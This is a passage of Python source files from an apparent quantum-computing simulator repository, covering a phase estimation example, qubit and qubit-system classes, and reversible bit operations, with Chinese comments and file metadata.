"text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nfrom numpy import pi, sqrt\nfrom nyasQuantumCalculate import *\n\n\nOptions.autoNormalize = False\n\n\"\"\"细节可以参考 https://www.bilibili.com/read/cv10995770\"\"\"\n\n\n###############################################################################\n\n# 需要求特征值的位门\nU = Rx(2*pi * sqrt(2))\n\n###############################################################################\n\"\"\"这个位门U有两个特征态和特征值\n|u1❭ = |+❭; λ1 = exp(-pi*i*sqrt(2))\n|u2❭ = |-❭; λ2 = exp( pi*i*sqrt(2))\n\n相位估计是求特征值exp(2*pi*i*φ)里的φ, 其中φ取值[0,1).\n也就是说U里的两个相位Φ为 φ1 = 1-sqrt(2)/2; φ2 = sqrt(2)/2\n\"\"\"\n\n###############################################################################\n\n# 初始化量子位系统, n为求解精度\nn = 8\nqbsys = QubitsSystem(n + 1)\nB = qbsys[0]\nA = qbsys[1:]\n\n# 制备叠加特征态, 因为这里的叠加特征态是|0❭, 所以什么也不做\n# 需要注意的是叠加特征态在运行相位估计之后会与相位量子位纠缠在一起\n# 这时候是无法抛弃储存特征态的量子位的\n\n# 相位评估电路\nApplyToEach(Builtin.H, A)\nfor i, qb in enumerate(A):\n for _ in range(2 ** i):\n Controlled(U, qb.asQubits(), B)\n# 因为上面的控制顺序已经反序, 则QFT并不需要再次反序\nwith TemporaryOptions.QFTswap(False):\n Builtin.IQFT(A)\n\n# 加一个H门是为了可视化更明显, 不加H门之前系统总状态有4个峰值\n# 加了H门后变为两个峰值, 看上去像是改变了相位估计的结果, 但实际上是没有的\nBuiltin.H(B)\n# 查看目前系统的总状态\nDumpSystemFig(qbsys)\n# 测量量子位, 重置系统, 输出\nresult = Builtin.MA(A)\nBuiltin.RA(qbsys[:])\nprint(\"测得φ为\", Utils.Bools2Int(result) / 2 ** n)\n" }, { "alpha_fraction": 0.4064748287200928, "alphanum_fraction": 0.4064748287200928, "avg_line_length": 15.352941513061523, "blob_id": "a08cac1ff7e1870cf58615adc2f24de43f44e670", "content_id": "1500f1433c851a2ae520c1d905b369cc86e53875", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 278, "license_type": "no_license", "max_line_length": 50, "num_lines": 17, "path": "/nyasQuantumCalculate/Builtin.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "from .Operate import *\n\n\n__all__ = [\n # ControlMethod\n \"CNOT\", \"CCNOT\",\n # Measure\n \"M\", \"MA\",\n # QFT\n \"QFT\", \"IQFT\", \"AQFT\", \"IAQFT\",\n # Reset\n \"R\", \"RA\",\n # SingleQubitGate\n \"I\", \"H\", \"X\", \"Y\", \"Z\", \"S\", \"T\", \"SR\", \"TR\",\n # Swap\n \"SWAP\",\n]\n" }, { "alpha_fraction": 0.5314494371414185, "alphanum_fraction": 0.5369188785552979, "avg_line_length": 23.10988998413086, "blob_id": "1ee2f9c793d0785b05e5c6cf794e72c62697d736", "content_id": "25b91531a04aa99a25b49cb59eb082cd88901f91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2524, "license_type": "no_license", "max_line_length": 79, "num_lines": 91, "path": "/nyasQuantumCalculate/System/Qubit.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import Any\n\nfrom .QubitsSystem import *\n\n\n__all__ = [\"Qubit\", \"TemporaryQubit\"]\n\n\nclass Qubit:\n \"\"\"Qubit(QubitsSystem, int)\n\n 单个量子位对象, 可以通过 `qbsys.getQubit(idx)` 或 `qbsys[idx]` 得到.\n\n 因为在Qubit里面会对QubitsSystem引用一次, 所以在释放QubitsSystems前\n 请确保所有相应的Qubit也被释放.\n\n Attributes:\n system: 量子位所在的系统\n index: 量子位索引\n \"\"\"\n\n def __init__(self, qbsys: QubitsSystem, idx: int) -> None:\n \"\"\"初始化\n\n Args:\n sys: 量子位所处的量子位系统\n idx: 量子位的索引, 应该从0开始到sys.nQubits-1\"\"\"\n if not 0 <= idx < qbsys.nQubits:\n raise ValueError(f\"The qubit indexed {idx} does not exist.\")\n self.system = qbsys\n self.index = idx\n\n def __str__(self) -> str:\n return f\"Qubit({self.index})\"\n\n def __repr__(self) -> str:\n return f\"Qubit({self.index} in system with id:{self.system.id})\"\n\n def __add__(self, other: Any) -> Any:\n raise NotImplementedError\n\n def asQubits(self) -> Any:\n \"\"\"返回与自身相应的Qubits对象(system相同, index相同)\n\n Returns:\n (Qubits)\"\"\"\n raise NotImplementedError\n\n\nclass TemporaryQubit:\n \"\"\"TemporaryQubit(QubitsSystem)\n\n 配合with语句产生临时的Qubit对象, 临时Qubit的内存块在with退出时会被销毁. 在\n 使用完临时Qubit后记得释放临时Qubit对象, 否则可能会引起不必要的错误.\n\n To use:\n >>> qbsys = QubitsSystem(4)\n >>> qbsys.nQubits\n 4\n >>> with TemporaryQubit(qbsys) as tmpQb:\n ... print(qbsys.nQubits, tmpQb)\n ...\n 5 Qubit(4)\n >>> qbsys.nQubits\n 4\n >>> del tmpQb # 释放临时Qubit对象\n \"\"\"\n\n def __init__(self, qbsys: QubitsSystem):\n self.system = qbsys\n\n def __enter__(self) -> Qubit:\n self.system.addQubits(1)\n return Qubit(self.system, self.system.nQubits - 1)\n\n def __exit__(self, *error: Any) -> None:\n self.system.popQubits(1)\n\n\n###############################################################################\n########################## * 你不应该调用以下方法 ##############################\n###############################################################################\n\n\ndef QubitsSystem_getQubit(self: QubitsSystem, idx: int) -> Qubit:\n return Qubit(self, idx)\n\n\nQubitsSystem.getQubit = QubitsSystem_getQubit\n" }, { "alpha_fraction": 0.5240384340286255, "alphanum_fraction": 0.5328525900840759, "avg_line_length": 29.62576675415039, "blob_id": "d80ff7264b1d72a29bb7017b8d51e6763455af89", "content_id": "7464992b6d850c5d80b507c9a3d0f2e8dd5789cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11386, "license_type": "no_license", "max_line_length": 80, "num_lines": 326, "path": "/nyasQuantumCalculate/System/QubitsSystem.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import List, Tuple, Union, Any\n\nimport numpy as np\n\nfrom nyasQuantumCalculate.Options import *\nfrom nyasQuantumCalculate.Utils import *\n\n\n__all__ = [\"QubitsSystem\"]\n\n\nclass id_manager:\n _last_id = -1\n\n @classmethod\n def getID(cls) -> int:\n cls._last_id += 1\n return cls._last_id\n\n\nclass QubitsSystem:\n \"\"\"QubitsSystem(nQubits)\n\n 用于储存和模拟量子位系统的类, 注意这个类不能被量子位过程(QubitsOperation)作用.\n\n 退出程序或释放QubitsSystem实例前需要重置整个系统\n\n Attributes:\n stopTracking: 设置为False后, 就算allowTracking为True都不会继续跟踪操作.\n\n To use:\n >>> qbsys = QubitsSystem(2)\n >>> qbsys.id\n 0\n >>> qbsys.nQubits\n 2\n >>> qbsys.states\n array([[1.+0.j],\n [0.+0.j],\n [0.+0.j],\n [0.+0.j]])\n \"\"\"\n\n def __init__(self, nQubits: int) -> None:\n self.statesNd = np.zeros([2] * nQubits, np.complex128)\n self.statesNd.__setitem__((*([0] * nQubits),), 1.)\n self._id = id_manager.getID()\n self._ctlBits: List[int] = list()\n self._ctlBitPkgs: List[List[int]] = list()\n self._qIndex = list(range(self.nQubits))\n self._qIndexR = list(range(self.nQubits))\n self._tracker: List[Tuple[Tuple[int, ...],\n Tuple[int, ...], str]] = list()\n self.stopTracking = False\n\n def __del__(self) -> None:\n print(f\"Cleaning up qubits system with id:{self._id} ...\")\n if Options.checkCleaningSystem and \\\n not equal0(np.abs(\n self.statesNd.__getitem__((*([0] * self.nQubits),))\n ) - 1.):\n raise RuntimeError(\"Before cleaning up qubits system, \"\n \"all qubits in system should be reset.\")\n\n @property\n def nQubits(self) -> int: return self.statesNd.ndim\n\n @property\n def nControllingQubits(self) -> int: return len(self._ctlBits)\n\n @property\n def id(self) -> int: return self._id\n\n @property\n def states(self) -> np.ndarray:\n # shape of states should be (2^n, 1) (column vector)\n indexes = self._qIndex[::-1] \\\n if Options.littleEndian else self._qIndex\n return self.statesNd. \\\n transpose(indexes). \\\n reshape([-1, 1])\n\n def __str__(self) -> str:\n return f\"QubitsSystem({self.nQubits})\"\n\n def __repr__(self) -> str:\n return f\"QubitsSystem(nQubits:{self.nQubits},id:{self._id})\"\n\n def __getitem__(self, idx: Union[int, slice]) -> Any:\n raise NotImplementedError\n\n def getQubit(self, idx: int) -> Any:\n \"\"\"得到系统内的一个量子位\n\n Args:\n idx: 量子位的索引, 应该从0开始到nQubits-1\n\n Returns:\n (Qubit)可以被量子位过程作用的量子位\"\"\"\n raise NotImplementedError\n\n def getQubits(self, *idxs: int) -> Any:\n \"\"\"得到系统内的多个量子位\n\n Args:\n idxs: 量子位的索引, 应该从0开始到nQubits-1\n\n Returns:\n (Qubit)可以被量子位过程作用的量子位\"\"\"\n raise NotImplementedError\n\n def normalize(self) -> None:\n \"\"\"归一化系统\"\"\"\n self.statesNd /= np.sqrt(sss(self.statesNd))\n\n def getTracker(self):\n \"\"\"返回系统内记录步骤的对象\n\n Returns:\n (List[Tuple[Tuple[int, ...], Tuple[int, ...], str]])\n 列表内按顺序每项是系统经历的步骤. 步骤里第一项是控制位\n (如果不是控制位门则为空), 第二项是被控制位, 第三项是步骤的名字\n (由外部提供). 比如:\n\n [((), (0,), 'H'), ((0,), (1,), 'X'), ((), (1,), 'Z'),\n ((), (0, 1), 'SWAP'), ((), (0,), 'MEASURE'), ((), (1,), 'MEASURE'),\n ((), (0,), 'RESET'), ((), (1,), 'RESET')]\n 步骤: 先把H门作用在第0位, 然后把第0位设位控制位, 第1位设为被控制位, 作\n 用CNOT, 把Z门作用在第1位, 交换第0位和第1位, 测量第0和第1位, 重置第0和\n 第1位\"\"\"\n return self._tracker\n\n def restart(self) -> None:\n self.statesNd *= 0.\n self.statesNd.__setitem__((*([0] * self.nQubits),), 1.)\n self._ctlBits.clear()\n self._ctlBitPkgs.clear()\n self._qIndex = list(range(self.nQubits))\n self._qIndexR = list(range(self.nQubits))\n self._tracker.clear()\n self.stopTracking = False\n\n # TODO def isEntangled(self, idx: int) -> bool:\n\n ########################## Related to tracking ##########################\n\n def canTrack(self) -> bool:\n \"\"\"系统是否可以跟踪量子位操作\n\n 把属性stopTracking可以停止系统里的跟踪\n\n Returns:\n 返回当前系统是否可以跟踪\"\"\"\n return Options.allowTracking and not self.stopTracking\n\n def addTrack(self, name: str, *idxs: int) -> None:\n \"\"\"添加跟踪条目\n\n 调用此方法会无视任何条件, 给跟踪器加上条目. 正常使用应该要\n 先使用`canTrack()`判断是否可以跟踪再进行添加.\n\n Args:\n name: 操作的名字\n idxs: 被控制位 或 操作的作用位\"\"\"\n self._tracker.append((tuple(self._ctlBits), tuple(idxs), name))\n\n ###########################################################################\n ################## * 一般情况下, 你不应该调用以下方法 #######################\n ###########################################################################\n\n #################### Related to controlling qubits ######################\n\n def checkQuickIndexCorrect(self) -> bool:\n \"\"\"检查内部快速索引是否正常\n\n 没有实际用途, 只在 DEBUG 时会用上.\"\"\"\n if len(self._qIndex) != self.statesNd.ndim:\n return False\n if len(self._qIndex) != len(self._qIndexR):\n return False\n if not all(idx0 == idx1\n for idx0, idx1 in\n zip(self._ctlBits, self._qIndexR[-len(self._ctlBits):])):\n return False\n for (idx0, idxx0), (idx1, idxx1) in zip(\n enumerate(self._qIndex),\n enumerate(self._qIndexR)\n ):\n if self._qIndex[idxx1] != idx1:\n return False\n if self._qIndexR[idxx0] != idx0:\n return False\n return True\n\n def isControlling(self, idx: int) -> bool:\n return idx in self._ctlBits\n\n def statesNdIndex(self, idx: int, reverse: bool = False) -> int:\n \"\"\"内部数组的索引\n\n 当存在控制位时, 内部数组的索引与量子位索引不一致, 这个\n 方法是用于得到正确的索引的. 无论在什么时候都没必要调用这个方法\n\n Args:\n idx: 量子位的索引, 应该从0开始到nQubits-1.\n reverse: 当为True, 从数组索引得到量子位索引\n\n Returns:\n 索引\"\"\"\n if not 0 <= idx < self.nQubits:\n raise ValueError(f\"The qubit indexed {idx} does not exist.\")\n if not self._ctlBits:\n return idx\n if reverse:\n return self._qIndexR[idx]\n return self._qIndex[idx]\n\n def addControllingQubits(self, *idxs: int) -> None:\n \"\"\"增加一组控制位*\n\n 用于多重控制的情况, 新增控制位不可以与已有控制位相同, 使用\n popControllingQubiys()来取消控制位.\n\n *请使用 `Controlled(opr, ctlQbs, ...)` 来控制过程\n\n Args:\n idxs: 量子位的索引, 应该从0开始到nQubits-1\"\"\"\n if not idxs:\n return\n if any(idx in self._ctlBits for idx in idxs):\n raise ValueError(\"Controlling bit is added repeatedly.\")\n self._ctlBitPkgs.append(list(idxs))\n self.updateControllingQubits()\n\n def popControllingQubits(self) -> None:\n \"\"\"删除一组控制位\n\n 删除最近添加的一组控制位\"\"\"\n if not self._ctlBitPkgs:\n return\n self._ctlBitPkgs.pop()\n self.updateControllingQubits()\n\n def updateQuickIndex(self) -> None:\n \"\"\"更新快速索引\n\n 使用_ctlBits更新_qIndex和_qIndexR\"\"\"\n if not self._ctlBitPkgs:\n self._qIndex = list(range(self.nQubits))\n self._qIndexR = list(range(self.nQubits))\n return\n self._qIndexR = [index for index in range(self.nQubits)\n if index not in self._ctlBits]\n self._qIndexR += self._ctlBits\n if len(self._qIndex) != self.nQubits:\n self._qIndex = list(range(self.nQubits))\n for index0, index1 in enumerate(self._qIndexR):\n self._qIndex[index1] = index0\n\n def updateControllingQubits(self) -> None:\n \"\"\"更新控制位\n\n 使用_ctlBitPkgs来更新_ctlBits\"\"\"\n if self._ctlBits:\n self.statesNd = self.statesNd.transpose(self._qIndex)\n self._ctlBits.clear()\n if not self._ctlBitPkgs:\n self.updateQuickIndex()\n return\n for pkg in self._ctlBitPkgs:\n self._ctlBits += pkg\n self._ctlBits.sort()\n self.updateQuickIndex()\n self.statesNd = self.statesNd.transpose(self._qIndexR)\n\n ##################### Related to temporary qubit ########################\n\n def addQubits(self, nQubits: int) -> None:\n \"\"\"增加量子位*\n\n 在系统里增加nQubits个量子位, 并分配在其他量子位末端.\n\n *请使用 `TemporaryQubit` 或 `TemporaryQubits` 分配临时量子位\n\n Args:\n nQubits: 新增量子位的数量\"\"\"\n if nQubits < 0:\n raise ValueError(f\"Cannot add {nQubits} qubits.\")\n if nQubits == 0:\n return\n if self._ctlBits:\n self.statesNd = self.statesNd.transpose(self._qIndex)\n new_states = np.zeros([2] * (self.nQubits + nQubits), np.complex128)\n new_states.__setitem__((..., *([0] * nQubits)), self.statesNd)\n self.statesNd = new_states\n self.updateQuickIndex()\n if self._ctlBits:\n self.statesNd = self.statesNd.transpose(self._qIndexR)\n\n def popQubits(self, nQubits: int) -> None:\n \"\"\"移除量子位\n\n 移除系统末端的nQubits个量子位, 量子位在被移除前需要被重置, 并且确保\n 被移除的量子位不是控制位\n\n Args:\n nQubits: 移除量子位的数量\"\"\"\n if nQubits < 0:\n raise ValueError(f\"Cannot pop {nQubits} qubits.\")\n if nQubits == 0:\n return\n if any(idx >= self.nQubits - nQubits for idx in self._ctlBits):\n raise ValueError(\"The qubit removed is controlling qubit.\")\n if self._ctlBits:\n self.statesNd = self.statesNd.transpose(self._qIndex)\n states = self.statesNd.__getitem__((..., *([0] * nQubits)))\n if not equal0(sss(states) - 1.):\n if self._ctlBits:\n self.statesNd = self.statesNd.transpose(self._qIndexR)\n raise RuntimeError(\"The qubit removed is not reset.\")\n self.statesNd = states.copy()\n self.updateQuickIndex()\n if self._ctlBits:\n self.statesNd = self.statesNd.transpose(self._qIndexR)\n" }, { "alpha_fraction": 0.48996156454086304, "alphanum_fraction": 0.49562153220176697, "avg_line_length": 28.632911682128906, "blob_id": "fc60fc1388e816311a6317d838b0c15d875ca9ad", "content_id": "92dbe3bbdbdfef64f7cd833216e195b8bf664056", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9364, "license_type": "no_license", "max_line_length": 81, "num_lines": 316, "path": "/nyasQuantumCalculate/RevCal/Operate.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import Any, Iterable, List, TypeVar\n\nfrom .System import *\nfrom nyasQuantumCalculate.Utils import Int2Bools\n\n\n__all__ = [\"BitsOperation\", \"Controlled\", \"ControlledOnBools\", \"ControlledOnInt\",\n \"ApplyToEach\", \"ApplyFromBools\", \"ApplyFromInt\", \"Toffoli\",\n \"M\", \"MA\", \"R\", \"RA\", \"I\", \"X\", \"CNOT\", \"CCNOT\", \"SWAP\"]\n\n\nclass BitsOperation:\n def __init__(self, name: str = \"\",\n controllable: bool = False,\n trackable: bool = False,\n **kwargs: Any) -> None:\n self.name = name\n self.controllable = controllable\n self.trackable = trackable\n\n # def call(self, ...) -> ...: ...\n\n def __call__(self, *args: Any, **kwargs: Any) -> Any:\n raise NotImplementedError\n\n\n###############################################################################\n###############################################################################\n\n\nclass _I(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"I\"\n self.controllable = True\n self.trackable = False\n\n def call(self, b: Bit) -> None:\n pass\n\n def __call__(self, b: Bit) -> None:\n bsys = b.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, b.index)\n bsys.stopTracking = True\n self.call(b)\n if not sysStopTrack:\n bsys.stopTracking = False\n\n\nclass _X(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"X\"\n self.controllable = True\n self.trackable = True\n\n def call(self, b: Bit) -> None:\n b.system.states[b.index] = not b.system.states[b.index]\n\n def __call__(self, b: Bit) -> None:\n bsys = b.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, b.index)\n bsys.stopTracking = True\n self.call(b)\n if not sysStopTrack:\n bsys.stopTracking = False\n\n\nI = _I()\nX = _X()\nSingleBitGate = TypeVar(\"SingleBitGate\", _I, _X)\n\n\n###############################################################################\n###############################################################################\n\n\ndef Controlled(opr: BitsOperation, ctlBs: Bits,\n *args: Any, **kwargs: Any) -> Any:\n if not opr.controllable:\n raise ValueError(\"Target process is uncontrollable.\")\n bsys = ctlBs.system\n bsys.addControllingBits(*ctlBs.indexes)\n if all(bsys.states[idx] for idx in bsys.ctlBits):\n opr(*args, **kwargs)\n bsys.popControllingBits()\n\n\ndef ControlledOnBools(opr: BitsOperation, bools: Iterable[bool], ctlBs: Bits,\n *args: Any, **kwargs: Any) -> Any:\n for bit, b in zip(bools, ctlBs):\n if not bit:\n X(b)\n result = Controlled(opr, ctlBs, *args, **kwargs)\n for bit, b in zip(bools, ctlBs):\n if not bit:\n X(b)\n return result\n\n\ndef ControlledOnInt(opr: BitsOperation, integer: int, ctlBs: Bits,\n *args: Any, **kwargs: Any) -> Any:\n bits = Int2Bools(integer, len(ctlBs))\n result = ControlledOnBools(opr, bits, ctlBs, *args, **kwargs)\n return result\n\n\nclass _CNOT(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"CNOT\"\n self.controllable = True\n\n def call(self, b0: Bit, b1: Bit) -> None:\n Controlled(X, b0.asBits(), b1)\n\n def __call__(self, b0: Bit, b1: Bit) -> None:\n if b0.system.id != b1.system.id:\n raise ValueError(\"Two bits are in different bit system.\")\n bsys = b0.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, b0.index, b1.index)\n bsys.stopTracking = True\n self.call(b0, b1)\n if not sysStopTrack:\n bsys.stopTracking = False\n\n\nclass _CCNOT(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"CCNOT\"\n self.controllable = True\n\n def call(self, b0: Bit, b1: Bit, b2: Bit) -> None:\n Controlled(X, b0 + b1, b2)\n\n def __call__(self, b0: Bit, b1: Bit, b2: Bit) -> None:\n if b0.system.id != b1.system.id or \\\n b0.system.id != b2.system.id:\n raise ValueError(\"Three bits are in different bit system.\")\n bsys = b0.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, b0.index, b1.index, b2.index)\n bsys.stopTracking = True\n self.call(b0, b1, b2)\n if not sysStopTrack:\n bsys.stopTracking = False\n\n\n###############################################################################\n###############################################################################\n\n\ndef ApplyToEach(gate: SingleBitGate, bs: Bits) -> None:\n for b in bs:\n gate(b)\n\n\ndef ApplyFromBools(gate: SingleBitGate, bools: Iterable[bool],\n bs: Bits) -> None:\n for bit, b in zip(bools, bs):\n if bit:\n gate(b)\n\n\ndef ApplyFromInt(gate: SingleBitGate, integer: int, bs: Bits) -> None:\n bits = Int2Bools(integer, len(bs))\n ApplyFromBools(gate, bits, bs)\n\n\n###############################################################################\n###############################################################################\n\n\nclass _SWAP(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"SWAP\"\n self.trackable = True\n\n def call(self, b0: Bit, b1: Bit) -> None:\n bsys = b0.system\n tmp = bsys.states[b0.index]\n bsys.states[b0.index] = bsys.states[b1.index]\n bsys.states[b1.index] = tmp\n\n def __call__(self, b0: Bit, b1: Bit) -> None:\n if b0.system.id != b1.system.id:\n raise ValueError(\"Two bits are in different bit system.\")\n bsys = b0.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, b0.index, b1.index)\n bsys.stopTracking = True\n self.call(b0, b1)\n if not sysStopTrack:\n bsys.stopTracking = False\n\n\n###############################################################################\n###############################################################################\n\n\nclass _RESET(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"RESET\"\n self.trackable = True\n\n def call(self, b: Bit) -> None:\n b.system.states[b.index] = False\n\n def __call__(self, b: Bit) -> None:\n bsys = b.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, b.index)\n bsys.stopTracking = True\n self.call(b)\n if not sysStopTrack:\n bsys.stopTracking = False\n\n\nclass _RESETALL(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"RESETALL\"\n self.trackable = True\n\n def call(self, bs: Bits) -> None:\n states = bs.system.states\n for index in bs.indexes:\n states[index] = False\n\n def __call__(self, bs: Bits) -> None:\n bsys = bs.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, *bs.indexes)\n bsys.stopTracking = True\n self.call(bs)\n if not sysStopTrack:\n bsys.stopTracking = False\n\n\n###############################################################################\n###############################################################################\n\n\nclass _MEASURE(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"MEASURE\"\n self.trackable = True\n\n def call(self, b: Bit) -> bool:\n return b.system.states[b.index]\n\n def __call__(self, b: Bit) -> bool:\n bsys = b.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, b.index)\n bsys.stopTracking = True\n result = self.call(b)\n if not sysStopTrack:\n bsys.stopTracking = False\n return result\n\n\nclass _MEASUREALL(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"MEASUREALL\"\n self.trackable = True\n\n def call(self, bs: Bits) -> List[bool]:\n states = bs.system.states\n return [states[index] for index in bs.indexes]\n\n def __call__(self, bs: Bits) -> List[bool]:\n bsys = bs.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, *bs.indexes)\n bsys.stopTracking = True\n result = self.call(bs)\n if not sysStopTrack:\n bsys.stopTracking = False\n return result\n\n\n###############################################################################\n###############################################################################\n\n\nM = _MEASURE()\nMA = _MEASUREALL()\n\nR = _RESET()\nRA = _RESETALL()\n\nCNOT = _CNOT()\nCCNOT = _CCNOT()\nToffoli = CCNOT\n\nSWAP = _SWAP()\n" }, { "alpha_fraction": 0.5486706495285034, "alphanum_fraction": 0.5532850027084351, "avg_line_length": 28.361289978027344, "blob_id": "aba2a21c0dec380cfda3eba35c7c29e9448ddec1", "content_id": "fd3a3ff44a6dcdf4bb5d1e264bad75ca08b2b4a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4847, "license_type": "no_license", "max_line_length": 79, "num_lines": 155, "path": "/nyasQuantumCalculate/System/Qubits.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import Union, Any\n\nfrom .QubitsSystem import *\nfrom .Qubit import *\n\n\n__all__ = [\"Qubits\", \"TemporaryQubits\"]\n\n\nclass Qubits:\n \"\"\"Qubits(QubitsSystem, *int)\n\n 多个量子位对象, 可以通过 `qbsys.getQubits(*idx)` 或 `qbsys[from:to]` 得到.\n\n 因为在Qubits里面会对QubitsSystem引用一次, 所以在释放QubitsSystems前\n 请确保所有相应的Qubits也被释放.\n\n Attributes:\n system: 量子位所在的系统\n indexes: 量子位索引\n \"\"\"\n\n def __init__(self, qbsys: QubitsSystem, *idxs: int) -> None:\n if not all(0 <= index < qbsys.nQubits for index in idxs):\n raise ValueError(\"Out of range index(es) in input parameters.\")\n self.system = qbsys\n self.indexes = list(idxs)\n self._ptr = 0\n\n def haveSameQubit(self) -> bool:\n return len(self.indexes) != len(set(self.indexes))\n\n def __str__(self) -> str:\n return f\"Qubits({len(self)} qubits)\"\n\n def __repr__(self) -> str:\n return \"Qubits([{}] in system with id:{})\".format(\n # 虽然可以写为 `','.join(self.indexes)`\n # 但是类型提示会出现, 所以就写多一步了\n ','.join(str(i) for i in self.indexes),\n self.system.id\n )\n\n def __len__(self) -> int: return len(self.indexes)\n\n def __getitem__(self, idxx: Union[slice, int]) -> Any:\n if isinstance(idxx, slice):\n return Qubits(self.system, *self.indexes[idxx])\n return Qubit(self.system, self.indexes[idxx])\n\n def __iter__(self) -> \"Qubits\":\n self._ptr = 0\n return self\n\n def __next__(self) -> Qubit:\n if self._ptr < len(self.indexes):\n self._ptr += 1\n return Qubit(self.system, self.indexes[self._ptr - 1])\n raise StopIteration\n\n def __iadd__(self, other: Union[Qubit, \"Qubits\"]) -> \"Qubits\":\n assert self.system.id == other.system.id\n if isinstance(other, Qubit):\n self.indexes.append(other.index)\n else:\n self.indexes += other.indexes\n return self\n\n def __add__(self, other: Union[Qubit, \"Qubits\"]) -> \"Qubits\":\n result = Qubits(self.system)\n result.indexes = self.indexes.copy()\n result += other\n return result\n\n\nclass TemporaryQubits:\n \"\"\"TemporaryQubits(QubitsSystem, int)\n\n 配合with语句产生临时的Qubits对象, 临时Qubits的内存块在with退出时会被销毁. 在\n 使用完临时Qubits后记得释放临时Qubits对象, 否则可能会引起不必要的错误.\n\n To use:\n >>> qbsys = QubitsSystem(4)\n >>> qbsys.nQubits\n 4\n >>> with TemporaryQubits(qbsys, 3) as tmpQbs:\n ... print(qbsys.nQubits, tmpQbs)\n ...\n 7 Qubits(3 qubits)\n >>> qbsys.nQubits\n 4\n >>> del tmpQbs # 释放临时Qubits对象\n \"\"\"\n def __init__(self, qbsys: QubitsSystem, nQubits: int):\n self.system = qbsys\n self.nQubits = nQubits\n\n def __enter__(self) -> Qubits:\n self.system.addQubits(self.nQubits)\n return Qubits(self.system, *range(self.system.nQubits - self.nQubits,\n self.system.nQubits))\n\n def __exit__(self, *error: Any) -> None:\n self.system.popQubits(self.nQubits)\n\n\n###############################################################################\n########################## * 你不应该调用以下方法 ##############################\n###############################################################################\n\n\ndef Qubit___add__(self: Qubit, other: Union[Qubit, Qubits]) -> Qubits:\n if isinstance(other, Qubits):\n return Qubits(self.system, self.index, *other.indexes)\n return Qubits(self.system, self.index, other.index)\n\n\ndef Qubit_asQubits(self: Qubit) -> Qubits:\n return Qubits(self.system, self.index)\n\n\ndef QubitsSystem_getQubits(self: QubitsSystem, *idxs: int) -> Qubits:\n if len(idxs) == 0:\n return Qubits(self, *range(self.nQubits))\n return Qubits(self, *idxs)\n\n\ndef QubitsSystem___getitem__(self: QubitsSystem,\n idx: Union[int, slice]) -> Any:\n if isinstance(idx, slice):\n step: int = idx.step or 1\n if step > 0:\n start = idx.start or 0\n stop = idx.stop or self.nQubits\n else:\n start = idx.start or self.nQubits - 1\n stop = idx.stop or -1\n if start < 0:\n start += self.nQubits\n if stop < 0:\n stop += self.nQubits\n return Qubits(self, *range(start, stop, step))\n else:\n if idx < 0:\n idx += self.nQubits\n return Qubit(self, idx)\n\n\nQubit.__add__ = Qubit___add__\nQubit.asQubits = Qubit_asQubits\n\nQubitsSystem.getQubits = QubitsSystem_getQubits\nQubitsSystem.__getitem__ = QubitsSystem___getitem__\n" }, { "alpha_fraction": 0.4503366947174072, "alphanum_fraction": 0.48569023609161377, "avg_line_length": 29.461538314819336, "blob_id": "612cb356c0cbb581be6b266b9f35f38b35184bb4", "content_id": "172262b6e0ab30ff73ebd2d4d79039ec53e95c12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1188, "license_type": "no_license", "max_line_length": 64, "num_lines": 39, "path": "/nyasQuantumCalculate/RevCal/HighLevel.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "from nyasQuantumCalculate.Options import *\nfrom .System import *\nfrom .Operate import *\n\n\n__all__ = [\"Adder\"]\n\n\ndef Adder(Cin: Bit, A: Bits, B: Bits, Cout: Bit) -> None:\n if not inSameSystem(Cin, A, B, Cout):\n raise ValueError(\"Input qubits are not in same system.\")\n if len(A) != len(B):\n raise ValueError(\"Length of A and B should be same.\")\n n = len(A)\n A_ = A if Options.littleEndian else A[::-1]\n B_ = B if Options.littleEndian else 